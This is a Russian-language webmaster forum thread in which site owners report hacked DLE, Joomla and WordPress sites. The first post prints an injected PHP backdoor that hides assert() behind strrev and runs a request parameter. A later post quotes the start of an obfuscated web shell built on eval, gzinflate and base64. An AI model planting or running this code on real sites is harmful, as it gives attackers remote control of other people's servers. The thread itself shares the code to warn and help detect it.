[seobb]

Относительно недавно хакеры освоили новый вид взлома ваших сайтов, для которого даже не надо заливать шелл и пр. Проставив пару строк кода они получают полный доступ к сайту - могут проставить свои ссылки или еще чего поинтереснее. В подробностях пояснить не могу т.к. не программист, то те люди, которые видели этот код сказали что он реально крут. Код как-то связан вот с этой функцией http://ru.php.net/manual/ru/function.assert.php и, грубо говоря, позволяет удалённо управлять чужим сайтом.

Скрывать его смысла нет, т.к. кто его может применить и так про него знает, а вот всем остальным стоит проверить свои файлы. У меня оказались взломанными два проекта - на DLE (в файле engine\modules\functions.php) и на Joomla (в файле \includes\defines.php). Код просто внедряется в случайное место внутри файлов, поэтому у вас он может быть в других файлах. Айболитом не определяется.

Код:

$define_id = $_REQUEST['bannerid'];
$parts_category = $_REQUEST['category'];
$define_key = '76793908';
$define_guard = strrev('tressa');    
if($define_id==$define_key) { 
    $define_guard(stripslashes($parts_category));//chekings
}

Не знаю массовое это явление или мне только так "повезло", но решил на всякий случай предупредить всех.

[brainix]

Проставив пару строк кода они получают полный доступ к сайту

Угу, шеллы заливать не надо, строки проставятся сами магическим образом.

Откуда узнали об этой уязвимости?

[pletniov]

Что-то совсем не ясно, если не заливать исполняемый код, то как внедрить вирусный...
Совсем непонятно, поподробнее бы почитать, а то все это из мира фантастики.

[Vasko]

Что-то совсем не ясно, если не заливать исполняемый код, то как внедрить вирусный...
Совсем непонятно, поподробнее бы почитать, а то все это из мира фантастики.

Как вариант такой код может быть в шаблоне дизайна либо в движке, который был скачан где-нибудь в "левом" месте. Тогда и правда ничего дополнительного заливать не надо.

[pletniov]

Vasko,такой подход известен всем давно! Но это скорее не уязвимость, а не внимательность человека, который поставил этот шаблон.

[ksirone]

Vasko, да это было всегда, в бесплатных шаблонах чего тока не найдешь. А вот как этот код попадет в ранее не зараженный сайт непонятно. У seobb просто в шаблонах наверно был.

[Vasko]

Vasko, да это было всегда, в бесплатных шаблонах чего тока не найдешь. А вот как этот код попадет в ранее не зараженный сайт непонятно. У seobb просто в шаблонах наверно был.

Со всем согласен.

ТС давайте еще подробностей.

[Dolmatov]

Кстати, на dle опять начали ломать сайты, частенько стал видеть что от куда то в файле banners.php появляться не понятны скрипт, который после удаления восстанавливаться сразу же.

[STRIJ]

Буквально на днях обнаружил что взломали один из сайтов на ВП и с морды сразу 5 ссылок поставили. Проверил файлы по дате изменения, нашел 1 файл main.php вот неполный код

PHP код:

<?php
$auth_pass = "f8dda7af509233889a8f3016d987be6b";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx

и несколько папок с файлами шелла. Сразу обновил движок до последней версии, сменил пароли ко всем БД на хостинге, сменил пароль к хостингу, фтп, пароль к админке сайта. Но, на след день, опять был загружен этот файл. Пишу в поддержку, там ничего поделать не могут, дают стандартные советы по безопасности... Может кто в курсе, как лезут и что делать? Наверно как-то к БД запросы делают, не знаю (

[Vitaxxxa]

STRIJ, Возможно файл сам восстанавливается через определённый промежуток времени. У меня на сайте похожая ситуация. Ссылки кто-то продавал - по всему сайту напихано было - удаляешь файл, он наследующий день опять на месте. Закрыл все файлы и папки шаблона на запись и проблема исчезла. Это конечно не лучший вариант, но как временное решение может сработать.